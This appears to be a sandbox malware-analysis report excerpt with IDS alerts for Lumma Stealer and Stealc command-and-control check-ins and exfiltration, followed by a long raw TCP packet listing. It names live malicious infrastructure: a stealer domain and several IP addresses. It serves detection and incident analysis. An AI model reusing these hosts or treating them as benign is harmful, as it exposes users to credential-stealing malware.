2024-11-08T15:20:38.899112+0100	2057120	ET MALWARE Observed Win32/Lumma Stealer Related Domain (navygenerayk .store in TLS SNI)	1	192.168.2.9	49741	188.114.97.3	443	TCP
2024-11-08T15:20:38.899112+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.9	49741	188.114.97.3	443	TCP
2024-11-08T15:20:40.600455+0100	2057120	ET MALWARE Observed Win32/Lumma Stealer Related Domain (navygenerayk .store in TLS SNI)	1	192.168.2.9	49750	188.114.97.3	443	TCP
2024-11-08T15:20:40.600455+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.9	49750	188.114.97.3	443	TCP
2024-11-08T15:20:41.207370+0100	2048094	ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration	1	192.168.2.9	49750	188.114.97.3	443	TCP
2024-11-08T15:20:42.745917+0100	2057120	ET MALWARE Observed Win32/Lumma Stealer Related Domain (navygenerayk .store in TLS SNI)	1	192.168.2.9	49762	188.114.97.3	443	TCP
2024-11-08T15:20:42.745917+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.9	49762	188.114.97.3	443	TCP
2024-11-08T15:20:44.775678+0100	2057120	ET MALWARE Observed Win32/Lumma Stealer Related Domain (navygenerayk .store in TLS SNI)	1	192.168.2.9	49771	188.114.97.3	443	TCP
2024-11-08T15:20:44.775678+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.9	49771	188.114.97.3	443	TCP
2024-11-08T15:20:46.436950+0100	2057120	ET MALWARE Observed Win32/Lumma Stealer Related Domain (navygenerayk .store in TLS SNI)	1	192.168.2.9	49782	188.114.97.3	443	TCP
2024-11-08T15:20:46.436950+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.9	49782	188.114.97.3	443	TCP
2024-11-08T15:20:46.442927+0100	2843864	ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2	1	192.168.2.9	49782	188.114.97.3	443	TCP
2024-11-08T15:20:49.110287+0100	2057120	ET MALWARE Observed Win32/Lumma Stealer Related Domain (navygenerayk .store in TLS SNI)	1	192.168.2.9	49793	188.114.97.3	443	TCP
2024-11-08T15:20:49.110287+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.9	49793	188.114.97.3	443	TCP
2024-11-08T15:20:49.632362+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.9	49793	188.114.97.3	443	TCP
2024-11-08T15:20:51.076431+0100	2022930	ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow	1	4.175.87.197	443	192.168.2.9	49799	TCP
2024-11-08T15:20:58.927778+0100	2044243	ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in	1	192.168.2.9	49844	185.215.113.206	80	TCP
2024-11-08T15:21:29.033414+0100	2022930	ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow	1	4.175.87.197	443	192.168.2.9	49983	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 8, 2024 15:20:35.683433056 CET	49726	443	192.168.2.9	188.114.97.3
Nov 8, 2024 15:20:35.683474064 CET	443	49726	188.114.97.3	192.168.2.9
Nov 8, 2024 15:20:35.683559895 CET	49726	443	192.168.2.9	188.114.97.3
Nov 8, 2024 15:20:35.686398983 CET	49726	443	192.168.2.9	188.114.97.3
Nov 8, 2024 15:20:35.686418056 CET	443	49726	188.114.97.3	192.168.2.9
Nov 8, 2024 15:20:36.332801104 CET	443	49726	188.114.97.3	192.168.2.9
Nov 8, 2024 15:20:36.332997084 CET	49726	443	192.168.2.9	188.114.97.3
Nov 8, 2024 15:20:36.345866919 CET	49726	443	192.168.2.9	188.114.97.3
Nov 8, 2024 15:20:36.345884085 CET	443	49726	188.114.97.3	192.168.2.9
Nov 8, 2024 15:20:36.346218109 CET	443	49726	188.114.97.3	192.168.2.9
Nov 8, 2024 15:20:36.391556025 CET	49726	443	192.168.2.9	188.114.97.3
Nov 8, 2024 15:20:36.402056932 CET	49726	443	192.168.2.9	188.114.97.3
Nov 8, 2024 15:20:36.402091026 CET	49726	443	192.168.2.9	188.114.97.3
Nov 8, 2024 15:20:36.402178049 CET	443	49726	188.114.97.3	192.168.2.9
Nov 8, 2024 15:20:36.904030085 CET	443	49726	188.114.97.3	192.168.2.9
Nov 8, 2024 15:20:36.904128075 CET	443	49726	188.114.97.3	192.168.2.9
Nov 8, 2024 15:20:36.904222965 CET	49726	443	192.168.2.9	188.114.97.3
Nov 8, 2024 15:20:36.905797005 CET	49726	443	192.168.2.9	188.114.97.3
Nov 8, 2024 15:20:36.905819893 CET	443	49726	188.114.97.3	192.168.2.9
Nov 8, 2024 15:20:36.905831099 CET	49726	443	192.168.2.9	188.114.97.3
Nov 8, 2024 15:20:36.905837059 CET	443	49726	188.114.97.3	192.168.2.9
Nov 8, 2024 15:20:36.952214003 CET	49733	443	192.168.2.9	188.114.97.3
Nov 8, 2024 15:20:36.952248096 CET	443	49733	188.114.97.3	192.168.2.9
Nov 8, 2024 15:20:36.952310085 CET	49733	443	192.168.2.9	188.114.97.3
Nov 8, 2024 15:20:36.952603102 CET	49733	443	192.168.2.9	188.114.97.3
Nov 8, 2024 15:20:36.952610970 CET	443	49733	188.114.97.3	192.168.2.9
Nov 8, 2024 15:20:37.570990086 CET	443	49733	188.114.97.3	192.168.2.9
Nov 8, 2024 15:20:37.571063042 CET	49733	443	192.168.2.9	188.114.97.3
Nov 8, 2024 15:20:37.573183060 CET	49733	443	192.168.2.9	188.114.97.3
Nov 8, 2024 15:20:37.573189974 CET	443	49733	188.114.97.3	192.168.2.9
Nov 8, 2024 15:20:37.573426008 CET	443	49733	188.114.97.3	192.168.2.9
Nov 8, 2024 15:20:37.575143099 CET	49733	443	192.168.2.9	188.114.97.3
Nov 8, 2024 15:20:37.575155973 CET	49733	443	192.168.2.9	188.114.97.3
Nov 8, 2024 15:20:37.575202942 CET	443	49733	188.114.97.3	192.168.2.9
Nov 8, 2024 15:20:38.073038101 CET	443	49733	188.114.97.3	192.168.2.9
Nov 8, 2024 15:20:38.073091984 CET	443	49733	188.114.97.3	192.168.2.9
Nov 8, 2024 15:20:38.073141098 CET	443	49733	188.114.97.3	192.168.2.9
Nov 8, 2024 15:20:38.073152065 CET	49733	443	192.168.2.9	188.114.97.3
Nov 8, 2024 15:20:38.073164940 CET	443	49733	188.114.97.3	192.168.2.9
Nov 8, 2024 15:20:38.073200941 CET	49733	443	192.168.2.9	188.114.97.3
Nov 8, 2024 15:20:38.073205948 CET	443	49733	188.114.97.3	192.168.2.9
Nov 8, 2024 15:20:38.073266983 CET	443	49733	188.114.97.3	192.168.2.9
Nov 8, 2024 15:20:38.073295116 CET	443	49733	188.114.97.3	192.168.2.9
Nov 8, 2024 15:20:38.073307037 CET	49733	443	192.168.2.9	188.114.97.3
Nov 8, 2024 15:20:38.073309898 CET	443	49733	188.114.97.3	192.168.2.9
Nov 8, 2024 15:20:38.073345900 CET	49733	443	192.168.2.9	188.114.97.3
Nov 8, 2024 15:20:38.073371887 CET	443	49733	188.114.97.3	192.168.2.9
Nov 8, 2024 15:20:38.079345942 CET	443	49733	188.114.97.3	192.168.2.9
Nov 8, 2024 15:20:38.079400063 CET	49733	443	192.168.2.9	188.114.97.3
Nov 8, 2024 15:20:38.079406023 CET	443	49733	188.114.97.3	192.168.2.9
Nov 8, 2024 15:20:38.125946999 CET	49733	443	192.168.2.9	188.114.97.3
Nov 8, 2024 15:20:38.188627958 CET	443	49733	188.114.97.3	192.168.2.9
Nov 8, 2024 15:20:38.188705921 CET	443	49733	188.114.97.3	192.168.2.9
Nov 8, 2024 15:20:38.188745022 CET	443	49733	188.114.97.3	192.168.2.9
Nov 8, 2024 15:20:38.188777924 CET	443	49733	188.114.97.3	192.168.2.9
Nov 8, 2024 15:20:38.188834906 CET	49733	443	192.168.2.9	188.114.97.3
Nov 8, 2024 15:20:38.188847065 CET	443	49733	188.114.97.3	192.168.2.9
Nov 8, 2024 15:20:38.188906908 CET	49733	443	192.168.2.9	188.114.97.3
Nov 8, 2024 15:20:38.188910961 CET	443	49733	188.114.97.3	192.168.2.9
Nov 8, 2024 15:20:38.188962936 CET	49733	443	192.168.2.9	188.114.97.3
Nov 8, 2024 15:20:38.189338923 CET	49733	443	192.168.2.9	188.114.97.3
Nov 8, 2024 15:20:38.189352036 CET	443	49733	188.114.97.3	192.168.2.9
Nov 8, 2024 15:20:38.189363003 CET	49733	443	192.168.2.9	188.114.97.3
Nov 8, 2024 15:20:38.189368963 CET	443	49733	188.114.97.3	192.168.2.9
Nov 8, 2024 15:20:38.295173883 CET	49741	443	192.168.2.9	188.114.97.3
Nov 8, 2024 15:20:38.295228958 CET	443	49741	188.114.97.3	192.168.2.9
Nov 8, 2024 15:20:38.295330048 CET	49741	443	192.168.2.9	188.114.97.3
Nov 8, 2024 15:20:38.295655012 CET	49741	443	192.168.2.9	188.114.97.3
Nov 8, 2024 15:20:38.295669079 CET	443	49741	188.114.97.3	192.168.2.9
Nov 8, 2024 15:20:38.899025917 CET	443	49741	188.114.97.3	192.168.2.9
Nov 8, 2024 15:20:38.899111986 CET	49741	443	192.168.2.9	188.114.97.3
Nov 8, 2024 15:20:38.935101032 CET	49741	443	192.168.2.9	188.114.97.3
Nov 8, 2024 15:20:38.935136080 CET	443	49741	188.114.97.3	192.168.2.9
Nov 8, 2024 15:20:38.935415983 CET	443	49741	188.114.97.3	192.168.2.9
Nov 8, 2024 15:20:38.936714888 CET	49741	443	192.168.2.9	188.114.97.3
Nov 8, 2024 15:20:38.937066078 CET	49741	443	192.168.2.9	188.114.97.3
Nov 8, 2024 15:20:38.937097073 CET	443	49741	188.114.97.3	192.168.2.9
Nov 8, 2024 15:20:39.842955112 CET	443	49741	188.114.97.3	192.168.2.9
Nov 8, 2024 15:20:39.843049049 CET	443	49741	188.114.97.3	192.168.2.9
Nov 8, 2024 15:20:39.843106031 CET	49741	443	192.168.2.9	188.114.97.3
Nov 8, 2024 15:20:39.843215942 CET	49741	443	192.168.2.9	188.114.97.3
Nov 8, 2024 15:20:39.843229055 CET	443	49741	188.114.97.3	192.168.2.9
Nov 8, 2024 15:20:39.969589949 CET	49750	443	192.168.2.9	188.114.97.3
Nov 8, 2024 15:20:39.969638109 CET	443	49750	188.114.97.3	192.168.2.9
Nov 8, 2024 15:20:39.969785929 CET	49750	443	192.168.2.9	188.114.97.3
Nov 8, 2024 15:20:39.970171928 CET	49750	443	192.168.2.9	188.114.97.3
Nov 8, 2024 15:20:39.970186949 CET	443	49750	188.114.97.3	192.168.2.9
Nov 8, 2024 15:20:40.600331068 CET	443	49750	188.114.97.3	192.168.2.9
Nov 8, 2024 15:20:40.600455046 CET	49750	443	192.168.2.9	188.114.97.3
Nov 8, 2024 15:20:40.601830959 CET	49750	443	192.168.2.9	188.114.97.3
Nov 8, 2024 15:20:40.601840973 CET	443	49750	188.114.97.3	192.168.2.9
Nov 8, 2024 15:20:40.602076054 CET	443	49750	188.114.97.3	192.168.2.9
Nov 8, 2024 15:20:40.603377104 CET	49750	443	192.168.2.9	188.114.97.3
Nov 8, 2024 15:20:40.603494883 CET	49750	443	192.168.2.9	188.114.97.3
Nov 8, 2024 15:20:40.603523016 CET	443	49750	188.114.97.3	192.168.2.9
Nov 8, 2024 15:20:40.603588104 CET	49750	443	192.168.2.9	188.114.97.3
Nov 8, 2024 15:20:40.603596926 CET	443	49750	188.114.97.3	192.168.2.9
Nov 8, 2024 15:20:41.205368042 CET	443	49750	188.114.97.3	192.168.2.9
Nov 8, 2024 15:20:41.205446959 CET	443	49750	188.114.97.3	192.168.2.9
Nov 8, 2024 15:20:41.205504894 CET	49750	443	192.168.2.9	188.114.97.3
Nov 8, 2024 15:20:41.205873013 CET	49750	443	192.168.2.9	188.114.97.3
Nov 8, 2024 15:20:41.205889940 CET	443	49750	188.114.97.3	192.168.2.9
Nov 8, 2024 15:20:41.925312042 CET	49762	443	192.168.2.9	188.114.97.3
Nov 8, 2024 15:20:41.925331116 CET	443	49762	188.114.97.3	192.168.2.9
Nov 8, 2024 15:20:41.925386906 CET	49762	443	192.168.2.9	188.114.97.3
Nov 8, 2024 15:20:41.925649881 CET	49762	443	192.168.2.9	188.114.97.3
Nov 8, 2024 15:20:41.925659895 CET	443	49762	188.114.97.3	192.168.2.9
Nov 8, 2024 15:20:42.745798111 CET	443	49762	188.114.97.3	192.168.2.9
Nov 8, 2024 15:20:42.745917082 CET	49762	443	192.168.2.9	188.114.97.3
Nov 8, 2024 15:20:42.747283936 CET	49762	443	192.168.2.9	188.114.97.3
Nov 8, 2024 15:20:42.747294903 CET	443	49762	188.114.97.3	192.168.2.9
Nov 8, 2024 15:20:42.747524023 CET	443	49762	188.114.97.3	192.168.2.9
Nov 8, 2024 15:20:42.748869896 CET	49762	443	192.168.2.9	188.114.97.3
Nov 8, 2024 15:20:42.749026060 CET	49762	443	192.168.2.9	188.114.97.3
Nov 8, 2024 15:20:42.749051094 CET	443	49762	188.114.97.3	192.168.2.9
Nov 8, 2024 15:20:42.749114990 CET	49762	443	192.168.2.9	188.114.97.3
Nov 8, 2024 15:20:42.749120951 CET	443	49762	188.114.97.3	192.168.2.9
Nov 8, 2024 15:20:43.417104006 CET	443	49762	188.114.97.3	192.168.2.9
Nov 8, 2024 15:20:43.417306900 CET	443	49762	188.114.97.3	192.168.2.9
Nov 8, 2024 15:20:43.417363882 CET	49762	443	192.168.2.9	188.114.97.3
Nov 8, 2024 15:20:43.417412996 CET	49762	443	192.168.2.9	188.114.97.3
Nov 8, 2024 15:20:43.417433023 CET	443	49762	188.114.97.3	192.168.2.9
Nov 8, 2024 15:20:43.922262907 CET	49771	443	192.168.2.9	188.114.97.3
Nov 8, 2024 15:20:43.922300100 CET	443	49771	188.114.97.3	192.168.2.9
Nov 8, 2024 15:20:43.922369003 CET	49771	443	192.168.2.9	188.114.97.3
Nov 8, 2024 15:20:43.926084995 CET	49771	443	192.168.2.9	188.114.97.3
Nov 8, 2024 15:20:43.926101923 CET	443	49771	188.114.97.3	192.168.2.9
Nov 8, 2024 15:20:44.775597095 CET	443	49771	188.114.97.3	192.168.2.9
Nov 8, 2024 15:20:44.775677919 CET	49771	443	192.168.2.9	188.114.97.3
Nov 8, 2024 15:20:44.777010918 CET	49771	443	192.168.2.9	188.114.97.3
Nov 8, 2024 15:20:44.777019024 CET	443	49771	188.114.97.3	192.168.2.9
Nov 8, 2024 15:20:44.777247906 CET	443	49771	188.114.97.3	192.168.2.9
Nov 8, 2024 15:20:44.778575897 CET	49771	443	192.168.2.9	188.114.97.3
Nov 8, 2024 15:20:44.778660059 CET	49771	443	192.168.2.9	188.114.97.3
Nov 8, 2024 15:20:44.778666973 CET	443	49771	188.114.97.3	192.168.2.9
Nov 8, 2024 15:20:45.275933981 CET	443	49771	188.114.97.3	192.168.2.9
Nov 8, 2024 15:20:45.276012897 CET	443	49771	188.114.97.3	192.168.2.9
Nov 8, 2024 15:20:45.276063919 CET	49771	443	192.168.2.9	188.114.97.3
Nov 8, 2024 15:20:45.277057886 CET	49771	443	192.168.2.9	188.114.97.3
Nov 8, 2024 15:20:45.277075052 CET	443	49771	188.114.97.3	192.168.2.9
Nov 8, 2024 15:20:45.792551041 CET	49782	443	192.168.2.9	188.114.97.3
Nov 8, 2024 15:20:45.792599916 CET	443	49782	188.114.97.3	192.168.2.9
Nov 8, 2024 15:20:45.792685032 CET	49782	443	192.168.2.9	188.114.97.3
Nov 8, 2024 15:20:45.792959929 CET	49782	443	192.168.2.9	188.114.97.3
Nov 8, 2024 15:20:45.792980909 CET	443	49782	188.114.97.3	192.168.2.9
Nov 8, 2024 15:20:46.436881065 CET	443	49782	188.114.97.3	192.168.2.9
Nov 8, 2024 15:20:46.436949968 CET	49782	443	192.168.2.9	188.114.97.3
Nov 8, 2024 15:20:46.438185930 CET	49782	443	192.168.2.9	188.114.97.3
Nov 8, 2024 15:20:46.438205957 CET	443	49782	188.114.97.3	192.168.2.9
Nov 8, 2024 15:20:46.438457966 CET	443	49782	188.114.97.3	192.168.2.9
Nov 8, 2024 15:20:46.440941095 CET	49782	443	192.168.2.9	188.114.97.3
Nov 8, 2024 15:20:46.441937923 CET	49782	443	192.168.2.9	188.114.97.3
Nov 8, 2024 15:20:46.441987038 CET	443	49782	188.114.97.3	192.168.2.9
Nov 8, 2024 15:20:46.442652941 CET	49782	443	192.168.2.9	188.114.97.3
Nov 8, 2024 15:20:46.442696095 CET	443	49782	188.114.97.3	192.168.2.9
Nov 8, 2024 15:20:46.442800999 CET	49782	443	192.168.2.9	188.114.97.3
Nov 8, 2024 15:20:46.442848921 CET	443	49782	188.114.97.3	192.168.2.9
Nov 8, 2024 15:20:46.443128109 CET	49782	443	192.168.2.9	188.114.97.3
Nov 8, 2024 15:20:46.443166971 CET	443	49782	188.114.97.3	192.168.2.9
Nov 8, 2024 15:20:46.443284988 CET	49782	443	192.168.2.9	188.114.97.3
Nov 8, 2024 15:20:46.443325996 CET	443	49782	188.114.97.3	192.168.2.9
Nov 8, 2024 15:20:46.443464041 CET	49782	443	192.168.2.9	188.114.97.3
Nov 8, 2024 15:20:46.443506956 CET	443	49782	188.114.97.3	192.168.2.9
Nov 8, 2024 15:20:46.443516016 CET	49782	443	192.168.2.9	188.114.97.3
Nov 8, 2024 15:20:46.443522930 CET	443	49782	188.114.97.3	192.168.2.9
Nov 8, 2024 15:20:46.443591118 CET	49782	443	192.168.2.9	188.114.97.3
Nov 8, 2024 15:20:46.443597078 CET	443	49782	188.114.97.3	192.168.2.9
Nov 8, 2024 15:20:46.443690062 CET	49782	443	192.168.2.9	188.114.97.3
Nov 8, 2024 15:20:46.443716049 CET	443	49782	188.114.97.3	192.168.2.9
Nov 8, 2024 15:20:46.443739891 CET	49782	443	192.168.2.9	188.114.97.3
Nov 8, 2024 15:20:46.443756104 CET	49782	443	192.168.2.9	188.114.97.3
Nov 8, 2024 15:20:46.443866968 CET	49782	443	192.168.2.9	188.114.97.3
Nov 8, 2024 15:20:46.443897963 CET	49782	443	192.168.2.9	188.114.97.3
Nov 8, 2024 15:20:46.453195095 CET	443	49782	188.114.97.3	192.168.2.9
Nov 8, 2024 15:20:46.453397036 CET	49782	443	192.168.2.9	188.114.97.3
Nov 8, 2024 15:20:46.453444004 CET	443	49782	188.114.97.3	192.168.2.9
Nov 8, 2024 15:20:46.453469038 CET	49782	443	192.168.2.9	188.114.97.3
Nov 8, 2024 15:20:46.453501940 CET	49782	443	192.168.2.9	188.114.97.3
Nov 8, 2024 15:20:46.455981016 CET	443	49782	188.114.97.3	192.168.2.9
Nov 8, 2024 15:20:48.400227070 CET	443	49782	188.114.97.3	192.168.2.9
Nov 8, 2024 15:20:48.400332928 CET	443	49782	188.114.97.3	192.168.2.9
Nov 8, 2024 15:20:48.400398970 CET	49782	443	192.168.2.9	188.114.97.3
Nov 8, 2024 15:20:48.400522947 CET	49782	443	192.168.2.9	188.114.97.3
Nov 8, 2024 15:20:48.400537968 CET	443	49782	188.114.97.3	192.168.2.9
Nov 8, 2024 15:20:48.441910028 CET	49793	443	192.168.2.9	188.114.97.3
Nov 8, 2024 15:20:48.441958904 CET	443	49793	188.114.97.3	192.168.2.9
Nov 8, 2024 15:20:48.442045927 CET	49793	443	192.168.2.9	188.114.97.3
Nov 8, 2024 15:20:48.442357063 CET	49793	443	192.168.2.9	188.114.97.3
Nov 8, 2024 15:20:48.442372084 CET	443	49793	188.114.97.3	192.168.2.9
Nov 8, 2024 15:20:49.110045910 CET	443	49793	188.114.97.3	192.168.2.9
Nov 8, 2024 15:20:49.110286951 CET	49793	443	192.168.2.9	188.114.97.3
Nov 8, 2024 15:20:49.111624002 CET	49793	443	192.168.2.9	188.114.97.3
Nov 8, 2024 15:20:49.111634016 CET	443	49793	188.114.97.3	192.168.2.9
Nov 8, 2024 15:20:49.111866951 CET	443	49793	188.114.97.3	192.168.2.9
Nov 8, 2024 15:20:49.113163948 CET	49793	443	192.168.2.9	188.114.97.3
Nov 8, 2024 15:20:49.113234997 CET	49793	443	192.168.2.9	188.114.97.3
Nov 8, 2024 15:20:49.113246918 CET	443	49793	188.114.97.3	192.168.2.9
Nov 8, 2024 15:20:49.632380962 CET	443	49793	188.114.97.3	192.168.2.9
Nov 8, 2024 15:20:49.632474899 CET	443	49793	188.114.97.3	192.168.2.9
Nov 8, 2024 15:20:49.632524014 CET	49793	443	192.168.2.9	188.114.97.3
Nov 8, 2024 15:20:49.634733915 CET	49793	443	192.168.2.9	188.114.97.3
Nov 8, 2024 15:20:49.634752989 CET	443	49793	188.114.97.3	192.168.2.9
Nov 8, 2024 15:20:49.634764910 CET	49793	443	192.168.2.9	188.114.97.3
Nov 8, 2024 15:20:49.634769917 CET	443	49793	188.114.97.3	192.168.2.9
Nov 8, 2024 15:20:49.636953115 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:49.642307043 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:49.642373085 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:49.644229889 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:49.649092913 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:50.574942112 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:50.574979067 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:50.574990034 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:50.575001001 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:50.575035095 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:50.575040102 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:50.575047016 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:50.575067043 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:50.575079918 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:50.575084925 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:50.575092077 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:50.575097084 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:50.575130939 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:50.580012083 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:50.580024004 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:50.580035925 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:50.580046892 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:50.580065012 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:50.580080986 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:50.740673065 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:50.740691900 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:50.740704060 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:50.740740061 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:50.740822077 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:50.740864038 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:50.740941048 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:50.740971088 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:50.740988970 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:50.740998983 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:50.741012096 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:50.741014957 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:50.741024971 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:50.741038084 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:50.741061926 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:50.741815090 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:50.741826057 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:50.741837025 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:50.741857052 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:50.782767057 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:50.859517097 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:50.859532118 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:50.859544039 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:50.859575033 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:50.859623909 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:50.859664917 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:50.859724045 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:50.859810114 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:50.859848976 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:50.860008001 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:50.860022068 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:50.860032082 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:50.860038042 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:50.860081911 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:50.860600948 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:50.860611916 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:50.860624075 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:50.860651970 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:50.906001091 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:50.906017065 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:50.906028032 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:50.906049967 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:50.906075954 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:50.978485107 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:50.978502989 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:50.978513956 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:50.978524923 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:50.978578091 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:50.978717089 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:50.978811026 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:50.978853941 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:50.978966951 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:50.978979111 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:50.978990078 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:50.979012012 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:50.979350090 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:50.979362011 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:50.979372978 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:50.979406118 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:50.979429960 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:51.024697065 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:51.024715900 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:51.024729013 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:51.024740934 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:51.024771929 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:51.024811983 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:51.097412109 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:51.097426891 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:51.097440958 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:51.097475052 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:51.097554922 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:51.097568989 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:51.097614050 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:51.097762108 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:51.097784042 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:51.097795963 CET	80	49800	185.215.113.16	192.168.2.9
